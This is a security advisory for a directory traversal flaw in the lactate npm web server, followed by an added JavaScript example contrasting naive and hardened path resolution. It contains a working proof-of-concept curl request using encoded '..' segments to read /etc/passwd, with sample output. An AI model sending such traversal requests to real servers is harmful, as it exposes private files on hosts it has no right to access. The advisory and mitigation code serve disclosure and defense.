
GHSA-68gr-cmcp-g3mj

Published: 14 Jun 2019
Source: github
Github: Reviewed
CVSS3: 7.5

Description

Directory Traversal in lactate

A crafted GET request can be used to traverse the directory structure of a host running the lactate web server package and to request arbitrary files outside the specified web root. This allows a remote attacker to gain access to arbitrary files on the filesystem that the process has access to read.

Mitigating factors: Only files that the user running lactate has permission to read will be accessible via this vulnerability.

Proof of concept: Please globally install the lactate package and cd to a directory you wish to serve assets from. Next, run lactate -p 8081 to start serving files from this location.

The following cURL request can be used to demonstrate this vulnerability by requesting the target /etc/passwd file:

curl "http://127.0.0.1:8081/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]

Recommendation

As there is currently no fix for this issue, selecting an alternative static web server would be the best choice.
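
An added example, not part of the advisory and not lactate's code: how a static file server can map a request path onto its web root so that percent-encoded dot segments like those in the request above cannot leave it, shown beside a naive mapping that can. The function names, the /srv/www root and the sample requests other than the PoC path are assumptions made for illustration.

```javascript
const posixPath = require('path').posix; // POSIX rules, matching the Linux PoC above

// 'Before' case (hypothetical handler): decode the URL path and join it to the
// root. join() collapses ".." segments, so the result can point outside the root.
function naiveResolve(root, urlPath) {
  return posixPath.join(root, decodeURIComponent(urlPath));
}

// Hardened mapping: returns an absolute path inside root, or null to reject.
// Not covered: symlinks inside the root. Resolve them with fs.realpath and
// repeat the containment check before opening the file.
function safeResolve(root, urlPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(urlPath); // decode exactly once
  } catch (err) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null; // NUL bytes never belong in a path

  const absRoot = posixPath.resolve(root);
  // Force the request to be interpreted relative to the root, then normalise.
  const target = posixPath.resolve(absRoot, '.' + posixPath.sep + decoded);

  // Containment check on the normalised result. The trailing separator stops
  // a sibling such as /srv/www-private from passing a bare prefix match.
  const prefix = absRoot.endsWith(posixPath.sep) ? absRoot : absRoot + posixPath.sep;
  if (target !== absRoot && !target.startsWith(prefix)) return null;
  return target;
}

// Constructed sample requests; ROOT is an assumed web root.
const ROOT = '/srv/www';
const samples = [
  '/css/site.css',
  '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', // request from the PoC
  '/../www-private/key.pem',
];
for (const s of samples) {
  console.log(s, '| naive:', naiveResolve(ROOT, s), '| safe:', safeResolve(ROOT, s));
}
```

A request rejected with null should be answered with an error status rather than falling back to another lookup.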

Packages

Name: lactate (npm)
Affected versions: <= 0.13.12
Fixed version: None

CVSS3: 7.5 High
Weaknesses: CWE-22
